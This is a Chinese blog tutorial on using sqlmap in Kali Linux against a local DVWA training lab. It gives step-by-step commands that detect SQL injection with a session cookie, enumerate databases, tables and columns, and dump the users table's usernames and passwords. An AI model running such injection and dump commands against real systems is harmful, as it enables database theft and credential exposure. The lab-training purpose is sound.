7.12、SQLmap—自动化渗透测试工具(kali linux)

最新推荐文章于 2024-03-30 18:40:19 发布
最新推荐文章于 2024-03-30 18:40:19 发布
阅读量1.1k 收藏 22
点赞数 27
分类专栏: 网络安全 文章标签: 自动化 测试工具 运维 网络 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33782021/article/details/135395346
版权

目录

一、准备工作

二、检测漏洞

第一步:获取待检测的url

第二步:获取cookie

第三步:生成命令行

三、获取数据库名

四、获取指定数据库表

五、获取指定数据库列/表项

六、获取数据

        sglmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。

一、准备工作

       1)kali操作系统自带sqlmap,可以直接输入sqlmap执行。

        2)启动apache2和mysql服务

        service apache2 start        # 启动apache2
        service mysql start            # 启动mysql

        3)打开DVWA靶场,将防御等级设置为low

二、检测漏洞

        命令行:sqlmap -u "要检查的网址"  --cookie ="网站登录后,后端返回的cookie值 

        cookie:登录凭证

第一步:获取待检测的url

        http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#

第二步:获取cookie

        回到DVWA按:F12  # 进入开发者模式

        security=low; PHPSESSID=jgf2conucodsct8sjjiduom5m2

第三步:生成命令行

        该命令行输入到虚拟机的命令框中务必自己输入,不要复制粘贴!!!

sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --coolie="security=low; PHPSESSID=jgf2conucodsct8sjjiduom5m2"

三、获取数据库名

        在第一步检测的的命令后面加上:--dbs     

        dbs:database server获取所有数据库名

sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=jgf2conucodsct8sjjiduom5m2" --dbs

四、获取指定数据库表

        在第一步检测的的命令后面加上:-D 数据库名称 --tables         

        -D(Database)指定想要获取的数据库名

        --tables 枚举(遍历)DBMS数据库中的表

sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=jgf2conucodsct8sjjiduom5m2" -D dvwa --tables

五、获取指定数据库列/表项

        在第一步检测的的命令后面加上:-D 数据库名 -T 数据库的表名 --columns  

        --columns 列出表项/例

sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=jgf2conucodsct8sjjiduom5m2" -D dvwa -T users --columns

六、获取数据

        把第五步命令后面的--columns换成:--dump  # 读取数据

sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=jgf2conucodsct8sjjiduom5m2" -D dvwa -T users --dump

很慢~,等待中ing

爆破到dvwa数据库中user表的用户名及密码,结束!

网运少年
关注
  • 27
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
kali2020重装SQLmap
qq_46927150的博客
06-12 3125
更新SQLmap时把SQLmap的文件夹删了,而且使用命令git clone https://github.com/sqlmapproject/sqlmap一直卡,下不下来。 重装步骤如下: (1)使用命令git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev (2)查看原来sqlmap的软链接指向的目录(/usr/bin/sqlmap): find / -name sqlmap (3)查看/usr/bi.
最新版linux elasticsearch-7.12.0-linux-x86_64.tar.gz
03-30
最新版linux elasticsearch-7.12.0-linux-x86_64.tar.gz最新版linux elasticsearch-7.12.0-linux-x86_64.tar.gz
kali Linux sqlmap安装遇到的问题
第二个大脑的
04-06 2727
1、在使用sqlmap过程中提示要更新,输入代码: “git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev” 2、网速不好导致中断,cd /usr/share/ 目录中删掉了sqlmap的目录。 3、在终端输入“git clone --depth 1 https://github.com/sqlmapp...
Brupsuite和sqlmap安装教程、Kali Linux2020.02安装
ywm_up
07-14 891
转载: Burpsuite超详细安装教程 sqlmap的安装教程 Kali Linux预装了许多渗透测试软件,做网络安全相关工作的也可以安装一下 Kali Linux 2020.2 安装教程 步骤截图详细讲解
CATSploit:一款基于CATS的自动化渗透测试执行工具
公众号【伤心的辣条】资料领取~
03-30 615
关于CATSploit CATSploit是一款基于CATS的自动化渗透测试执行工具,该工具基于网络攻击技术评分(CATS)方法实现其功能,可以在无需渗透测试人员操作的情况下,自动对目标应用执行安全渗透测试
sqlmap的安装与使用
qz362228的博客
08-13 9796
sqlmap的安装和使用
SQLmap
qq_41638872的博客
06-23 1512
SQLmap使用
sqlmap安装以及运用
m0_69435261的博客
08-24 1889
sqlmap是一个开源的渗透测试工具,它可以自动化检测sql注入漏洞利用sql注入缺陷 接管数据库服务器。
KaLi自带的sqlmap更新
m0_52701599的博客
01-25 6809
kali自带sqlmap更新
sqlmap的使用详细讲解
mogexiuluo的博客
05-29 2539
简介:是一个自动化的sql注入工具,主要功能扫描、发现并利用给定的url的sql注入漏洞,内置了很多插件sqlmap支持的数据库: MySQL、oracle、sql-server、DB2....注意:sqlmap只用来检测和sql注入,不能扫描网站的漏洞sqlmap使用的sql注入方式:1、基于布尔类型盲注:可以根据页面的返回判断条件真假的注入2、基于时间的盲注;根据页面返回内容判断,延迟时间是否执行3、基于报错注入:根据页面返回的错误信息。
sqlmapkali中的应用及ctfhub实战
2301_77004573的博客
07-08 1132
工具一把嗦固然方便,但仍不能忽视对原理的理解,毕竟常有sqlmap跑不出来的题目,为了检验自己对sql注入的掌握情况,之后也会补一篇手工注入的文章。
最新版linux kibana-7.12.0-linux-x86_64.tar.gz
03-30
最新版linux kibana-7.12.0-linux-x86_64.tar.gz最新版linux kibana-7.12.0-linux-x86_64.tar.gz
最新版linux logstash-7.12.0-linux-x86_64.tar.gz
03-30
最新版linux logstash-7.12.0-linux-x86_64.tar.gz最新版linux logstash-7.12.0-linux-x86_64.tar.gz
兆芯+中标linux+数科7.12.txt
12-04
linux中标系统下 wps安装包 无广告和收费提醒 此资源为百度网盘链接 cpu必须是兆芯 其他cpu使用出现任何问题概不负责,请认真阅读说明在安装
渗透神器nmap-7.70.zip
06-22
渗透神器 nmap-7.70
Kali Linux渗透测试 093 自动注入-Sqlmap
kevinhanser
09-17 7658
本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程 1. Sqlmap 简介 2. Target 3. Requests 4.Optization(优化) 5. injection 6. detection 7. techniques 8. fingerprint(指纹
(亲测有效)关于sql注入漏洞的测试、发现以及sqlmap工具的使用
guijianchouxyz的博客
07-21 2614
(亲测有效)关于sql注入漏洞的测试以及发现,尝试了百篇文章总结出来的 今天单位突然说有个平台有sql注入漏洞,让找出来来是什么样的sql漏洞,真是nn腿了,只能用下面的这张图来代表自己的心情了 关于sql注入的几点想法 网上面有那么多的sqlmap工具的使用方法,前篇一律,都是看不懂 网上好多关于sql注入的视频也是看一遍懵逼一遍 使用了好多的方法,为什么人家的就可以咱的就不行的 浪费了时间,这个也不能花钱让别人做 废话少说,开干 第一步,安装sqlmap 既然要用到这个工具,那我们
【网安神器篇】——Sqlmap详解
热门推荐
Demo不是emo的博客
01-13 1万+
sqlmap源码阅读
linux安装Elasticsearch-7.12
最新发布
04-11
安装Elasticsearch-7.12可以按照以下步骤进行: 1. 首先,确保你的Linux系统已经安装了Java运行环境(JRE/JDK)。你可以通过在终端中输入以下命令来检查Java是否已安装: ``` java -version ``` 2. 下载Elasticsearch-7.12的压缩包。你可以在Elasticsearch官方网站的下载页面找到相应的版本。选择适合你系统的版本并下载。 3. 解压缩下载的压缩包。在终端中进入到下载目录,并执行以下命令解压缩: ``` tar -xzf elasticsearch-7.12.0-linux-x86_64.tar.gz ``` 4. 进入解压缩后的Elasticsearch目录: ``` cd elasticsearch-7.12.0 ``` 5. 打开`config/elasticsearch.yml`文件,编辑以下配置项: ``` cluster.name: my-elasticsearch-cluster node.name: my-elasticsearch-node ``` 6. 启动Elasticsearch节点。在终端中执行以下命令: ``` ./bin/elasticsearch ``` 7. 等待一段时间,直到Elasticsearch成功启动。你可以通过访问`http://localhost:9200`来验证是否成功启动。如果看到类似以下输出,则表示Elasticsearch已经成功运行: ``` { "name" : "my-elasticsearch-node", "cluster_name" : "my-elasticsearch-cluster", "cluster_uuid" : "xxxxxxxxxxxx", "version" : { "number" : "7.12.0", "build_flavor" : "default", "build_type" : "tar", "build_hash" : "xxxxxxxxxxxx", "build_date" : "2021-03-18T06:17:15.410153305Z", "build_snapshot" : false, "lucene_version" : "8.8.0", "minimum_wire_compatibility_version" : "6.8.0", "minimum_index_compatibility_version" : "6.0.0-beta1" }, "tagline" : "You Know, for Search" } ``` 以上是安装Elasticsearch-7.12的基本步骤。如果你需要更详细的配置和使用说明,请参考Elasticsearch官方文档。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

网运少年

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值